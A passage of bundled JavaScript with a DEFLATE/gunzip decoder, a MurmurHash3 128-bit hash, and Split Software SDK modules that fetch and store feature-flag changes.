  var fdt = new u8(32);

  for (var i = 0; i < 32; ++i) {
    fdt[i] = 5;
  } // fixed length map


  var flrm = /*#__PURE__*/hMap(flt, 9, 1); // fixed distance map

  var fdrm = /*#__PURE__*/hMap(fdt, 5, 1); // find max of array

  var max = function max(a) {
    var m = a[0];

    for (var i = 1; i < a.length; ++i) {
      if (a[i] > m) m = a[i];
    }

    return m;
  }; // read d, starting at bit p and mask with m


  var bits = function bits(d, p, m) {
    var o = p / 8 | 0;
    return (d[o] | d[o + 1] << 8) >> (p & 7) & m;
  }; // read d, starting at bit p continuing for at least 16 bits


  var bits16 = function bits16(d, p) {
    var o = p / 8 | 0;
    return (d[o] | d[o + 1] << 8 | d[o + 2] << 16) >> (p & 7);
  }; // get end of byte


  var shft = function shft(p) {
    return (p + 7) / 8 | 0;
  }; // typed array slice - allows garbage collector to free original reference,
  // while being more compatible than .slice


  var slc = function slc(v, s, e) {
    if (s == null || s < 0) s = 0;
    if (e == null || e > v.length) e = v.length; // can't use .constructor in case user-supplied

    var n = new (v instanceof u16 ? u16 : v instanceof u32 ? u32 : u8)(e - s);
    n.set(v.subarray(s, e));
    return n;
  }; // error codes


  var ec = ['unexpected EOF', 'invalid block type', 'invalid length/literal', 'invalid distance', 'stream finished', 'no stream handler',, 'no callback', 'invalid UTF-8 data', 'extra field too long', 'date not in range 1980-2099', 'filename too long', 'stream finishing', 'invalid zip data' // determined by unknown compression method
  ];

  var err = function err(ind, msg, nt) {
    var e = new Error(msg || ec[ind]);
    e.code = ind;
    if (Error.captureStackTrace) Error.captureStackTrace(e, err);
    if (!nt) throw e;
    return e;
  }; // expands raw DEFLATE data


  var inflt = function inflt(dat, buf, st) {
    // source length
    var sl = dat.length;
    if (!sl || st && st.f && !st.l) return buf || new u8(0); // have to estimate size

    var noBuf = !buf || st; // no state

    var noSt = !st || st.i;
    if (!st) st = {}; // Assumes roughly 33% compression ratio average

    if (!buf) buf = new u8(sl * 3); // ensure buffer can fit at least l elements

    var cbuf = function cbuf(l) {
      var bl = buf.length; // need to increase size to fit

      if (l > bl) {
        // Double or set to necessary, whichever is greater
        var nbuf = new u8(Math.max(bl * 2, l));
        nbuf.set(buf);
        buf = nbuf;
      }
    }; //  last chunk         bitpos           bytes


    var final = st.f || 0,
        pos = st.p || 0,
        bt = st.b || 0,
        lm = st.l,
        dm = st.d,
        lbt = st.m,
        dbt = st.n; // total bits

    var tbts = sl * 8;

    do {
      if (!lm) {
        // BFINAL - this is only 1 when last chunk is next
        final = bits(dat, pos, 1); // type: 0 = no compression, 1 = fixed huffman, 2 = dynamic huffman

        var type = bits(dat, pos + 1, 3);
        pos += 3;

        if (!type) {
          // go to end of byte boundary
          var s = shft(pos) + 4,
              l = dat[s - 4] | dat[s - 3] << 8,
              t = s + l;

          if (t > sl) {
            if (noSt) err(0);
            break;
          } // ensure size


          if (noBuf) cbuf(bt + l); // Copy over uncompressed data

          buf.set(dat.subarray(s, t), bt); // Get new bitpos, update byte count

          st.b = bt += l, st.p = pos = t * 8, st.f = final;
          continue;
        } else if (type == 1) lm = flrm, dm = fdrm, lbt = 9, dbt = 5;else if (type == 2) {
          //  literal                            lengths
          var hLit = bits(dat, pos, 31) + 257,
              hcLen = bits(dat, pos + 10, 15) + 4;
          var tl = hLit + bits(dat, pos + 5, 31) + 1;
          pos += 14; // length+distance tree

          var ldt = new u8(tl); // code length tree

          var clt = new u8(19);

          for (var i = 0; i < hcLen; ++i) {
            // use index map to get real code
            clt[clim[i]] = bits(dat, pos + i * 3, 7);
          }

          pos += hcLen * 3; // code lengths bits

          var clb = max(clt),
              clbmsk = (1 << clb) - 1; // code lengths map

          var clm = hMap(clt, clb, 1);

          for (var i = 0; i < tl;) {
            var r = clm[bits(dat, pos, clbmsk)]; // bits read

            pos += r & 15; // symbol

            var s = r >>> 4; // code length to copy

            if (s < 16) {
              ldt[i++] = s;
            } else {
              //  copy   count
              var c = 0,
                  n = 0;
              if (s == 16) n = 3 + bits(dat, pos, 3), pos += 2, c = ldt[i - 1];else if (s == 17) n = 3 + bits(dat, pos, 7), pos += 3;else if (s == 18) n = 11 + bits(dat, pos, 127), pos += 7;

              while (n--) {
                ldt[i++] = c;
              }
            }
          } //    length tree                 distance tree


          var lt = ldt.subarray(0, hLit),
              dt = ldt.subarray(hLit); // max length bits

          lbt = max(lt); // max dist bits

          dbt = max(dt);
          lm = hMap(lt, lbt, 1);
          dm = hMap(dt, dbt, 1);
        } else err(1);

        if (pos > tbts) {
          if (noSt) err(0);
          break;
        }
      } // Make sure the buffer can hold this + the largest possible addition
      // Maximum chunk size (practically, theoretically infinite) is 2^17;


      if (noBuf) cbuf(bt + 131072);
      var lms = (1 << lbt) - 1,
          dms = (1 << dbt) - 1;
      var lpos = pos;

      for (;; lpos = pos) {
        // bits read, code
        var c = lm[bits16(dat, pos) & lms],
            sym = c >>> 4;
        pos += c & 15;

        if (pos > tbts) {
          if (noSt) err(0);
          break;
        }

        if (!c) err(2);
        if (sym < 256) buf[bt++] = sym;else if (sym == 256) {
          lpos = pos, lm = null;
          break;
        } else {
          var add = sym - 254; // no extra bits needed if less

          if (sym > 264) {
            // index
            var i = sym - 257,
                b = fleb[i];
            add = bits(dat, pos, (1 << b) - 1) + fl[i];
            pos += b;
          } // dist


          var d = dm[bits16(dat, pos) & dms],
              dsym = d >>> 4;
          if (!d) err(3);
          pos += d & 15;
          var dt = fd[dsym];

          if (dsym > 3) {
            var b = fdeb[dsym];
            dt += bits16(dat, pos) & (1 << b) - 1, pos += b;
          }

          if (pos > tbts) {
            if (noSt) err(0);
            break;
          }

          if (noBuf) cbuf(bt + 131072);
          var end = bt + add;

          for (; bt < end; bt += 4) {
            buf[bt] = buf[bt - dt];
            buf[bt + 1] = buf[bt + 1 - dt];
            buf[bt + 2] = buf[bt + 2 - dt];
            buf[bt + 3] = buf[bt + 3 - dt];
          }

          bt = end;
        }
      }

      st.l = lm, st.p = lpos, st.b = bt, st.f = final;
      if (lm) final = 1, st.m = lbt, st.d = dm, st.n = dbt;
    } while (!final);

    return bt == buf.length ? buf : slc(buf, 0, bt);
  }; // gzip footer: -8 to -4 = CRC, -4 to -0 is length
  // gzip start


  var gzs = function gzs(d) {
    if (d[0] != 31 || d[1] != 139 || d[2] != 8) err(6, 'invalid gzip data');
    var flg = d[3];
    var st = 10;
    if (flg & 4) st += d[10] | (d[11] << 8) + 2;

    for (var zs = (flg >> 3 & 1) + (flg >> 4 & 1); zs > 0; zs -= !d[st++]) {
      ;
    }

    return st + (flg & 2);
  }; // gzip length


  var gzl = function gzl(d) {
    var l = d.length;
    return (d[l - 4] | d[l - 3] << 8 | d[l - 2] << 16 | d[l - 1] << 24) >>> 0;
  }; // zlib valid


  var zlv = function zlv(d) {
    if ((d[0] & 15) != 8 || d[0] >>> 4 > 7 || (d[0] << 8 | d[1]) % 31) err(6, 'invalid zlib data');
    if (d[1] & 32) err(6, 'invalid zlib data: preset dictionaries not supported');
  };

  return {
    /**
     * Expands GZIP data
     * @param data The data to decompress
     * @param out Where to write the data. GZIP already encodes the output size, so providing this doesn't save memory.
     * @returns The decompressed version of the data
     */
    gunzipSync: function gunzipSync(data, out) {
      return inflt(data.subarray(gzs(data), -8), out || new u8(gzl(data)));
    },

    /**
     * Expands Zlib data
     * @param data The data to decompress
     * @param out Where to write the data. Saves memory if you know the decompressed size and provide an output buffer of that length.
     * @returns The decompressed version of the data
     */
    unzlibSync: function unzlibSync(data, out) {
      return inflt((zlv(data), data.subarray(2, -4)), out);
    }
  };
}();

/***/ }),
/* 2866 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = hash64;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__murmur3_128__ = __webpack_require__(2867);

/**
 * Use instead of parseInt, to not lose precision when converting big integers (greater than 2^53 - 1)
 */

function hex2dec(s
/*: string */
)
/*: string */
{
  var i,
      j,
      digits = [0],
      carry;

  for (i = 0; i < s.length; i += 1) {
    carry = parseInt(s.charAt(i), 16);

    for (j = digits.length - 1; j >= 0; j -= 1) {
      digits[j] = digits[j] * 16 + carry;
      carry = digits[j] / 10 | 0;
      digits[j] %= 10;
    }

    while (carry > 0) {
      digits.unshift(carry % 10);
      carry = carry / 10 | 0;
    }
  }

  return digits.join('');
}
/**
 * Gets the higher 64 bits of the x64 version of Murmur3 for 128bits, as decimal and hexadecimal number strings.
 * Used for MySegments channel V2 notifications.
 * @param {string} str
 */


function hash64(str
/*: string */
)
/*: { hex: string, dec: string } */
{
  var hex = Object(__WEBPACK_IMPORTED_MODULE_0__murmur3_128__["a" /* hash128 */])(str).slice(0, 16);
  return {
    hex: hex,
    // BoundedFetchRequest notification
    dec: hex2dec(hex) // KeyList notification

  };
}

/***/ }),
/* 2867 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = hash128;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__common__ = __webpack_require__(1283);
/* eslint-disable no-fallthrough */

/*!
 * +----------------------------------------------------------------------------------+
 * | murmurHash3.js v3.0.0 (http://github.com/karanlyons/murmurHash3.js)              |
 * | A TypeScript/JavaScript implementation of MurmurHash3's hashing algorithms.      |
 * |----------------------------------------------------------------------------------|
 * | Copyright (c) 2012-2020 Karan Lyons. Freely distributable under the MIT license. |
 * +----------------------------------------------------------------------------------+
 */
// PRIVATE FUNCTIONS
// -----------------

function _x64Add(m, n) {
  //
  // Given two 64bit ints (as an array of two 32bit ints) returns the two
  // added together as a 64bit int (as an array of two 32bit ints).
  //
  m = [m[0] >>> 16, m[0] & 0xffff, m[1] >>> 16, m[1] & 0xffff];
  n = [n[0] >>> 16, n[0] & 0xffff, n[1] >>> 16, n[1] & 0xffff];
  var o = [0, 0, 0, 0];
  o[3] += m[3] + n[3];
  o[2] += o[3] >>> 16;
  o[3] &= 0xffff;
  o[2] += m[2] + n[2];
  o[1] += o[2] >>> 16;
  o[2] &= 0xffff;
  o[1] += m[1] + n[1];
  o[0] += o[1] >>> 16;
  o[1] &= 0xffff;
  o[0] += m[0] + n[0];
  o[0] &= 0xffff;
  return [o[0] << 16 | o[1], o[2] << 16 | o[3]];
}

function _x64Multiply(m, n) {
  //
  // Given two 64bit ints (as an array of two 32bit ints) returns the two
  // multiplied together as a 64bit int (as an array of two 32bit ints).
  //
  m = [m[0] >>> 16, m[0] & 0xffff, m[1] >>> 16, m[1] & 0xffff];
  n = [n[0] >>> 16, n[0] & 0xffff, n[1] >>> 16, n[1] & 0xffff];
  var o = [0, 0, 0, 0];
  o[3] += m[3] * n[3];
  o[2] += o[3] >>> 16;
  o[3] &= 0xffff;
  o[2] += m[2] * n[3];
  o[1] += o[2] >>> 16;
  o[2] &= 0xffff;
  o[2] += m[3] * n[2];
  o[1] += o[2] >>> 16;
  o[2] &= 0xffff;
  o[1] += m[1] * n[3];
  o[0] += o[1] >>> 16;
  o[1] &= 0xffff;
  o[1] += m[2] * n[2];
  o[0] += o[1] >>> 16;
  o[1] &= 0xffff;
  o[1] += m[3] * n[1];
  o[0] += o[1] >>> 16;
  o[1] &= 0xffff;
  o[0] += m[0] * n[3] + m[1] * n[2] + m[2] * n[1] + m[3] * n[0];
  o[0] &= 0xffff;
  return [o[0] << 16 | o[1], o[2] << 16 | o[3]];
}

function _x64Rotl(m, n) {
  //
  // Given a 64bit int (as an array of two 32bit ints) and an int
  // representing a number of bit positions, returns the 64bit int (as an
  // array of two 32bit ints) rotated left by that number of positions.
  //
  n %= 64;

  if (n === 32) {
    return [m[1], m[0]];
  } else if (n < 32) {
    return [m[0] << n | m[1] >>> 32 - n, m[1] << n | m[0] >>> 32 - n];
  } else {
    n -= 32;
    return [m[1] << n | m[0] >>> 32 - n, m[0] << n | m[1] >>> 32 - n];
  }
}

function _x64LeftShift(m, n) {
  //
  // Given a 64bit int (as an array of two 32bit ints) and an int
  // representing a number of bit positions, returns the 64bit int (as an
  // array of two 32bit ints) shifted left by that number of positions.
  //
  n %= 64;

  if (n === 0) {
    return m;
  } else if (n < 32) {
    return [m[0] << n | m[1] >>> 32 - n, m[1] << n];
  } else {
    return [m[1] << n - 32, 0];
  }
}

function _x64Xor(m, n) {
  //
  // Given two 64bit ints (as an array of two 32bit ints) returns the two
  // xored together as a 64bit int (as an array of two 32bit ints).
  //
  return [m[0] ^ n[0], m[1] ^ n[1]];
}

function _x64Fmix(h) {
  //
  // Given a block, returns murmurHash3's final x64 mix of that block.
  // (`[0, h[0] >>> 1]` is a 33 bit unsigned right shift. This is the
  // only place where we need to right shift 64bit ints.)
  //
  h = _x64Xor(h, [0, h[0] >>> 1]);
  h = _x64Multiply(h, [0xff51afd7, 0xed558ccd]);
  h = _x64Xor(h, [0, h[0] >>> 1]);
  h = _x64Multiply(h, [0xc4ceb9fe, 0x1a85ec53]);
  h = _x64Xor(h, [0, h[0] >>> 1]);
  return h;
} // PUBLIC FUNCTIONS
// ----------------


function hash128x64(key
/*: string */
, seed
/*: number */
)
/*: string */
{
  //
  // Given a string and an optional seed as an int, returns a 128 bit
  // hash using the x64 flavor of MurmurHash3, as an unsigned hex.
  //
  key = key || '';
  seed = seed || 0;
  var remainder = key.length % 16;
  var bytes = key.length - remainder;
  var h1 = [0, seed];
  var h2 = [0, seed];
  var k1 = [0, 0];
  var k2 = [0, 0];
  var c1 = [0x87c37b91, 0x114253d5];
  var c2 = [0x4cf5ad43, 0x2745937f];

  for (var i = 0; i < bytes; i = i + 16) {
    k1 = [key.charCodeAt(i + 4) & 0xff | (key.charCodeAt(i + 5) & 0xff) << 8 | (key.charCodeAt(i + 6) & 0xff) << 16 | (key.charCodeAt(i + 7) & 0xff) << 24, key.charCodeAt(i) & 0xff | (key.charCodeAt(i + 1) & 0xff) << 8 | (key.charCodeAt(i + 2) & 0xff) << 16 | (key.charCodeAt(i + 3) & 0xff) << 24];
    k2 = [key.charCodeAt(i + 12) & 0xff | (key.charCodeAt(i + 13) & 0xff) << 8 | (key.charCodeAt(i + 14) & 0xff) << 16 | (key.charCodeAt(i + 15) & 0xff) << 24, key.charCodeAt(i + 8) & 0xff | (key.charCodeAt(i + 9) & 0xff) << 8 | (key.charCodeAt(i + 10) & 0xff) << 16 | (key.charCodeAt(i + 11) & 0xff) << 24];
    k1 = _x64Multiply(k1, c1);
    k1 = _x64Rotl(k1, 31);
    k1 = _x64Multiply(k1, c2);
    h1 = _x64Xor(h1, k1);
    h1 = _x64Rotl(h1, 27);
    h1 = _x64Add(h1, h2);
    h1 = _x64Add(_x64Multiply(h1, [0, 5]), [0, 0x52dce729]);
    k2 = _x64Multiply(k2, c2);
    k2 = _x64Rotl(k2, 33);
    k2 = _x64Multiply(k2, c1);
    h2 = _x64Xor(h2, k2);
    h2 = _x64Rotl(h2, 31);
    h2 = _x64Add(h2, h1);
    h2 = _x64Add(_x64Multiply(h2, [0, 5]), [0, 0x38495ab5]);
  }

  k1 = [0, 0];
  k2 = [0, 0];

  switch (remainder) {
    case 15:
      k2 = _x64Xor(k2, _x64LeftShift([0, key.charCodeAt(i + 14)], 48));

    case 14:
      k2 = _x64Xor(k2, _x64LeftShift([0, key.charCodeAt(i + 13)], 40));

    case 13:
      k2 = _x64Xor(k2, _x64LeftShift([0, key.charCodeAt(i + 12)], 32));

    case 12:
      k2 = _x64Xor(k2, _x64LeftShift([0, key.charCodeAt(i + 11)], 24));

    case 11:
      k2 = _x64Xor(k2, _x64LeftShift([0, key.charCodeAt(i + 10)], 16));

    case 10:
      k2 = _x64Xor(k2, _x64LeftShift([0, key.charCodeAt(i + 9)], 8));

    case 9:
      k2 = _x64Xor(k2, [0, key.charCodeAt(i + 8)]);
      k2 = _x64Multiply(k2, c2);
      k2 = _x64Rotl(k2, 33);
      k2 = _x64Multiply(k2, c1);
      h2 = _x64Xor(h2, k2);

    case 8:
      k1 = _x64Xor(k1, _x64LeftShift([0, key.charCodeAt(i + 7)], 56));

    case 7:
      k1 = _x64Xor(k1, _x64LeftShift([0, key.charCodeAt(i + 6)], 48));

    case 6:
      k1 = _x64Xor(k1, _x64LeftShift([0, key.charCodeAt(i + 5)], 40));

    case 5:
      k1 = _x64Xor(k1, _x64LeftShift([0, key.charCodeAt(i + 4)], 32));

    case 4:
      k1 = _x64Xor(k1, _x64LeftShift([0, key.charCodeAt(i + 3)], 24));

    case 3:
      k1 = _x64Xor(k1, _x64LeftShift([0, key.charCodeAt(i + 2)], 16));

    case 2:
      k1 = _x64Xor(k1, _x64LeftShift([0, key.charCodeAt(i + 1)], 8));

    case 1:
      k1 = _x64Xor(k1, [0, key.charCodeAt(i)]);
      k1 = _x64Multiply(k1, c1);
      k1 = _x64Rotl(k1, 31);
      k1 = _x64Multiply(k1, c2);
      h1 = _x64Xor(h1, k1);
  }

  h1 = _x64Xor(h1, [0, key.length]);
  h2 = _x64Xor(h2, [0, key.length]);
  h1 = _x64Add(h1, h2);
  h2 = _x64Add(h2, h1);
  h1 = _x64Fmix(h1);
  h2 = _x64Fmix(h2);
  h1 = _x64Add(h1, h2);
  h2 = _x64Add(h2, h1);
  return ('00000000' + (h1[0] >>> 0).toString(16)).slice(-8) + ('00000000' + (h1[1] >>> 0).toString(16)).slice(-8) + ('00000000' + (h2[0] >>> 0).toString(16)).slice(-8) + ('00000000' + (h2[1] >>> 0).toString(16)).slice(-8);
}
/**
 * x64 version of Murmur3 for 128bits.
 * Used in hashImpression128.
 * @param {string} str
 */


function hash128(str
/*: string */
, seed
/*: number */
)
/*: string */
{
  return hash128x64(Object(__WEBPACK_IMPORTED_MODULE_0__common__["a" /* UTF16ToUTF8 */])(str), seed >>> 0);
}

/***/ }),
/* 2868 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__task__ = __webpack_require__(703);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__updater_SplitChanges__ = __webpack_require__(2869);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__browser_Partial__ = __webpack_require__(1293);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/




var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-producer:updater');
/**
 * Startup all the background jobs required for a Browser SDK instance.
 */

var FullBrowserProducer = function FullBrowserProducer(context) {
  var settings = context.get(context.constants.SETTINGS);
  var splitsUpdater = Object(__WEBPACK_IMPORTED_MODULE_2__updater_SplitChanges__["a" /* default */])(context);
  var splitsUpdaterTask = Object(__WEBPACK_IMPORTED_MODULE_1__task__["a" /* default */])(synchronizeSplits, settings.scheduler.featuresRefreshRate);
  var mySegmentsProducer = Object(__WEBPACK_IMPORTED_MODULE_3__browser_Partial__["a" /* default */])(context);
  var _isSynchronizingSplits = false;
  /**
   * @param {boolean | undefined} noCache true to revalidate data to fetch
   */

  function synchronizeSplits(noCache) {
    _isSynchronizingSplits = true; // `splitsUpdater` promise always resolves, and with a false value if it fails to fetch or store splits

    return splitsUpdater(0, noCache).then(function (res) {
      _isSynchronizingSplits = false;
      return res;
    });
  }

  return {
    // Start periodic fetching (polling)
    start: function start() {
      log.info('Starting BROWSER producer');
      splitsUpdaterTask.start();
      mySegmentsProducer.start();
    },
    // Stop periodic fetching (polling)
    stop: function stop() {
      log.info('Stopping BROWSER producer');
      splitsUpdaterTask.stop();
      mySegmentsProducer.stop();
    },
    // Used by SyncManager to know if running in polling mode.
    isRunning: splitsUpdaterTask.isRunning,
    // Used by SplitUpdateWorker
    isSynchronizingSplits: function isSynchronizingSplits() {
      return _isSynchronizingSplits;
    },
    synchronizeSplits: synchronizeSplits,
    // Used by MySegmentUpdateWorker
    isSynchronizingMySegments: mySegmentsProducer.isSynchronizingMySegments,
    synchronizeMySegments: mySegmentsProducer.synchronizeMySegments
  };
};

/* harmony default export */ __webpack_exports__["a"] = (FullBrowserProducer);

/***/ }),
/* 2869 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = SplitChangesUpdaterFactory;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__fetcher_SplitChanges__ = __webpack_require__(2870);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__engine_parser_segments__ = __webpack_require__(2873);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_lang_Errors__ = __webpack_require__(280);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils_lang_Sets__ = __webpack_require__(353);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__utils_promise_thenable__ = __webpack_require__(75);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-producer:split-changes');




 // For server-side segments storage, returns true if all registered segments have been fetched (changeNumber !== -1)

function checkAllSegmentsExist(segmentsStorage) {
  return segmentsStorage.getRegisteredSegments().every(function (segmentName) {
    return segmentsStorage.getChangeNumber(segmentName) !== -1;
  });
}

function computeSplitsMutation(entries) {
  var computed = entries.reduce(function (accum, split) {
    if (split.status === 'ACTIVE') {
      accum.added.push([split.name, JSON.stringify(split)]);
      Object(__WEBPACK_IMPORTED_MODULE_2__engine_parser_segments__["a" /* default */])(split.conditions).forEach(function (segmentName) {
        accum.segments.add(segmentName);
      });
    } else {
      accum.removed.push(split.name);
    }

    return accum;
  }, {
    added: [],
    removed: [],
    segments: new __WEBPACK_IMPORTED_MODULE_4__utils_lang_Sets__["a" /* _Set */]()
  });
  computed.segments = Object(__WEBPACK_IMPORTED_MODULE_4__utils_lang_Sets__["b" /* setToArray */])(computed.segments);
  return computed;
}

function SplitChangesUpdaterFactory(context, isNode) {
  if (isNode === void 0) {
    isNode = false;
  }

  var _context$getAll = context.getAll(),
      settings = _context$getAll[context.constants.SETTINGS],
      readiness = _context$getAll[context.constants.READINESS],
      storage = _context$getAll[context.constants.STORAGE],
      metricCollectors = _context$getAll[context.constants.COLLECTORS];

  var splitsEventEmitter = readiness.splits;
  var startingUp = true;
  var readyOnAlreadyExistentState = true;
  /**
   * Split updater returns a promise that resolves with a `false` boolean value if it fails to fetch splits or synchronize them with the storage.
   *
   * @param {number | undefined} retry current number of retry attemps. this param is only set by SplitChangesUpdater itself.
   * @param {boolean | undefined} noCache true to revalidate data to fetch
   */

  return function SplitChangesUpdater(retry, noCache) {
    if (retry === void 0) {
      retry = 0;
    }

    function splitChanges(since) {
      log.debug("Spin up split update using since = " + since);
      var fetcherPromise = Object(__WEBPACK_IMPORTED_MODULE_1__fetcher_SplitChanges__["a" /* default */])(settings, since, startingUp, metricCollectors, isNode, noCache).then(function (splitChanges) {
        startingUp = false;
        var mutation = computeSplitsMutation(splitChanges.splits);
        log.debug("New splits " + mutation.added.length);
        log.debug("Removed splits " + mutation.removed.length);
        log.debug("Segment names collected " + mutation.segments); // Write into storage
        // @TODO if allowing custom storages, wrap errors as SplitErrors to distinguish from user callback errors

        return Promise.all([// calling first `setChangenumber` method, to perform cache flush if split filter queryString changed
        storage.splits.setChangeNumber(splitChanges.till), storage.splits.addSplits(mutation.added), storage.splits.removeSplits(mutation.removed), storage.segments.registerSegments(mutation.segments)]).then(function () {
          // On server-side SDK, we must check that all registered segments have been fetched
          if (readyOnAlreadyExistentState || since !== splitChanges.till && (!isNode || checkAllSegmentsExist(storage.segments))) {
            readyOnAlreadyExistentState = false;
            splitsEventEmitter.emit(splitsEventEmitter.SDK_SPLITS_ARRIVED);
          }
        });
      }).catch(function (error) {
        // handle user callback errors
        if (!(error instanceof __WEBPACK_IMPORTED_MODULE_3__utils_lang_Errors__["a" /* SplitError */])) {
          setTimeout(function () {
            throw error;
          }, 0);
          startingUp = false; // Stop retrying.
        }

        log.warn("Error while doing fetch of Splits. " + error);

        if (startingUp && settings.startup.retriesOnFailureBeforeReady > retry) {
          retry += 1;
          log.info("Retrying download of splits #" + retry + ". Reason: " + error);
          return SplitChangesUpdater(retry, noCache);
        } else {
          startingUp = false;
        }

        return false;
      }); // After triggering the requests, if we have cached splits information let's notify
      // that asynchronously, to let attach a listener for SDK_READY_FROM_CACHE

      if (startingUp && storage.splits.checkCache()) {
        setTimeout(splitsEventEmitter.emit(splitsEventEmitter.SDK_SPLITS_CACHE_LOADED), 0);
      }

      return fetcherPromise;
    } // @TODO check why e2e tests take so much time when sync storage result is not handled in a promise


    var since = storage.splits.getChangeNumber();
    var sincePromise = Object(__WEBPACK_IMPORTED_MODULE_5__utils_promise_thenable__["a" /* default */])(since) ? since : Promise.resolve(since);
    return sincePromise.then(splitChanges);
  };
}

/***/ }),
/* 2870 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_promise_timeout__ = __webpack_require__(1292);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__ = __webpack_require__(278);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_lang_Errors__ = __webpack_require__(280);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__services_splitChanges__ = __webpack_require__(2871);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__services_splitChanges_get__ = __webpack_require__(2872);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/






function splitChangesFetcher(settings, since, startingUp, metricCollectors, isNode, noCache) {
  if (startingUp === void 0) {
    startingUp = false;
  }

  var filterQueryString = settings.sync.__splitFiltersValidation.queryString;
  var splitsPromise = Object(__WEBPACK_IMPORTED_MODULE_3__services_splitChanges__["a" /* default */])(Object(__WEBPACK_IMPORTED_MODULE_4__services_splitChanges_get__["a" /* default */])(settings, since, filterQueryString, noCache));
  var collectMetrics = startingUp || isNode; // If we are on the browser, only collect this metric for first fetch. On node do it always.

  splitsPromise = __WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__["a" /* default */].start(__WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__["a" /* default */].TaskNames.SPLITS_FETCH, collectMetrics ? metricCollectors : false, splitsPromise);

  if (startingUp) {
    // Decorate with the timeout functionality if required
    splitsPromise = Object(__WEBPACK_IMPORTED_MODULE_0__utils_promise_timeout__["a" /* default */])(settings.startup.requestTimeoutBeforeReady, splitsPromise);
  }

  return splitsPromise // JSON parsing errors are handled as SplitErrors, to distinguish from user callback errors
  .then(function (resp) {
    return resp.json().catch(function (error) {
      throw new __WEBPACK_IMPORTED_MODULE_2__utils_lang_Errors__["a" /* SplitError */](error.message);
    });
  });
}

/* harmony default export */ __webpack_exports__["a"] = (splitChangesFetcher);

/***/ }),
/* 2871 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__transport__ = __webpack_require__(279);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

/* harmony default export */ __webpack_exports__["a"] = (__WEBPACK_IMPORTED_MODULE_0__transport__["a" /* default */]);

/***/ }),
/* 2872 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = GET;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__request__ = __webpack_require__(203);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

function GET(settings, since, filterQueryString, noCache) {
  return Object(__WEBPACK_IMPORTED_MODULE_0__request__["a" /* default */])(settings, "/splitChanges?since=" + since + (filterQueryString || ''), undefined, noCache ? __WEBPACK_IMPORTED_MODULE_0__request__["b" /* noCacheExtraHeader */] : undefined);
}

/***/ }),
/* 2873 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang_Sets__ = __webpack_require__(353);

/**
 * Collect segments from a raw split definition.
